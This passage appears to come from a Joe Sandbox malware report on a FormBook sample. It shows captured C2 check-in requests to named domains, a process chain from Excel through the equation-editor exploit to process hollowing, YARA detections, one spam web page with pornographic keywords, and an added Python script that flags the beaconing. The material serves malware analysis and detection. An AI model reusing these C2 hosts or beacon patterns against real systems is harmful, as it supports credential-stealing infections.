                                                  Date: Thu, 13 Jan 2022 19:23:17 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 
78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css"><!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name chang


                                                  Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                  7           192.168.2.22  49175        23.80.120.93    80                C:\Windows\explorer.exe
                                                  Timestamp                            kBytes transferred  Direction  Data
                                                  Jan 13, 2022 20:23:23.008996964 CET  517                 OUT        GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1
                                                  Host: www.bjbwx114.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:23.537935019 CET  519                 IN         HTTP/1.1 200 OK
                                                  Date: Thu, 13 Jan 2022 19:23:13 GMT
                                                  Content-Length: 1795
                                                  Content-Type: text/html
                                                  Server: nginx
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 c1 d9 e2 a2 d0 cb ce bb bf c6 bc bc d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37 3b 26 23 32 39 33 37 38 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37 3b 26 23 32 39 33 37 38 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 
32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#26085;&#26412;&#30127;&#29378;&#39640;&#28526;&#88;&#88;&#88;&#88;&#35270;&#39057;,&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;</title><meta name="keywords" content="&#26085;&#26412;&#30127;&#29378;&#39640;&#28526;&#88;&#88;&#88;&#88;&#35270;&#39057;,&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;" /><meta name="description" content="&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;,&#26085;&#26412;&#30127
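The sessions above are the FormBook check-in pattern as this sandbox run recorded it: explorer.exe, which the hollowed vbc.exe injected into, sends a bare GET to /i5nb/ with two query parameters carrying base64-like values and nothing but Host and Connection: close as headers, then rotates to the next host a few seconds later. Three of the four hosts answered 404 (two are HostGator placeholder pages) and the fourth returned an unrelated SEO-spam page, so the server reply says nothing about whether the traffic is malicious; the request shape and the originating process do. The Python below is an added example, not code from Joe Sandbox or from the malware: it scores request heads on those indicators. The three malicious request heads are copied from sessions 4, 5 and 7; the Firefox request, the process names other than explorer.exe and the scoring threshold are constructed assumptions.

```python
"""Triage HTTP request/response pairs for FormBook-style beaconing.

Added example for this report; it is not part of Joe Sandbox or of the
malware.  The three malicious request heads are copied from sessions 4, 5
and 7 of the capture; the fourth request and the Firefox process name are
constructed for contrast.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# (client process path, raw request head, first line of the server reply)
SAMPLES = [
    ("C:\\Windows\\explorer.exe",
     "GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1\r\n"
     "Host: www.terapiaholisticaemformacao.com\r\nConnection: close\r\n\r\n",
     "HTTP/1.1 404 Not Found"),
    ("C:\\Windows\\explorer.exe",
     "GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1\r\n"
     "Host: www.ecommerceoptimise.com\r\nConnection: close\r\n\r\n",
     "HTTP/1.1 404 Not Found"),
    ("C:\\Windows\\explorer.exe",
     "GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1\r\n"
     "Host: www.bjbwx114.com\r\nConnection: close\r\n\r\n",
     "HTTP/1.1 200 OK"),
    # Constructed benign browser request used as a negative control.
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
     "User-Agent: Mozilla/5.0\r\nAccept: text/html\r\nConnection: keep-alive\r\n\r\n",
     "HTTP/1.1 200 OK"),
]

# Processes that do not speak HTTP on their own; the report shows the beacons
# leaving from explorer.exe after injection.  Extend for your own estate.
SHELL_PROCESSES = {"explorer.exe"}

PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")        # e.g. /i5nb/
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")    # base64 alphabet, optional padding


def parse_request(raw):
    """Split a raw HTTP request head into (method, target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def split_query(query):
    """Split a query string without URL-decoding, so '+' and '/' survive."""
    pairs = []
    for item in query.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((name, value))
    return pairs


def beacon_indicators(process, raw):
    """Return (path, host, indicator list) for one request head."""
    method, target, headers = parse_request(raw)
    parts = urlsplit(target)
    params = split_query(parts.query)
    hits = []
    if process.rsplit("\\", 1)[-1].lower() in SHELL_PROCESSES:
        hits.append("client is a shell process")
    if method == "GET" and PATH_RE.match(parts.path):
        hits.append("short directory-style path")
    if len(params) == 2 and all(B64_RE.match(v) for _, v in params):
        hits.append("two base64-like query values")
    if headers.get("connection", "").lower() == "close" and "user-agent" not in headers:
        hits.append("no User-Agent and Connection: close")
    return parts.path, headers.get("host", ""), hits


def triage(samples, threshold=3):
    """Score every request.  The reply status is recorded but never lowers
    the score: most hosts in a FormBook list are decoys that answer 404."""
    hosts_per_path = defaultdict(set)
    rows = []
    for process, raw, status in samples:
        path, host, hits = beacon_indicators(process, raw)
        hosts_per_path[path].add(host)
        rows.append({"path": path, "host": host, "status": status, "hits": hits})
    for row in rows:
        n = len(hosts_per_path[row["path"]])
        if n >= 2:
            row["hits"].append("same path %s seen on %d hosts" % (row["path"], n))
        row["suspicious"] = len(row["hits"]) >= threshold
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLES):
        print(row["host"], row["status"], row["suspicious"], row["hits"])
```

The cross-host rule is the one that matters in a real capture: a single GET to a parked domain is noise, the same odd path and parameter names on several unrelated hosts within twenty seconds is a C2 list being walked. Feed the function the request heads from your proxy or IDS logs together with the originating process from EDR telemetry; without the process name the shell-process indicator cannot fire and the threshold should be lowered to match.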


                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  System Behavior

                                                  General

                                                  Start time:20:21:22
                                                  Start date:13/01/2022
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13ffd0000
                                                  File size:28253536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:20:21:46
                                                  Start date:13/01/2022
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:20:21:49
                                                  Start date:13/01/2022
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\Public\vbc.exe"
                                                  Imagebase:0x11a0000
                                                  File size:417792 bytes
                                                  MD5 hash:83AC585E99B527EEB278702F8F711568
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 44%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:21:52
                                                  Start date:13/01/2022
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\Public\vbc.exe
                                                  Imagebase:0x11a0000
                                                  File size:417792 bytes
                                                  MD5 hash:83AC585E99B527EEB278702F8F711568
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:20:21:55
                                                  Start date:13/01/2022
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0xffa10000
                                                  File size:3229696 bytes
                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:20:22:08
                                                  Start date:13/01/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                  Imagebase:0x49d90000
                                                  File size:302592 bytes
                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis
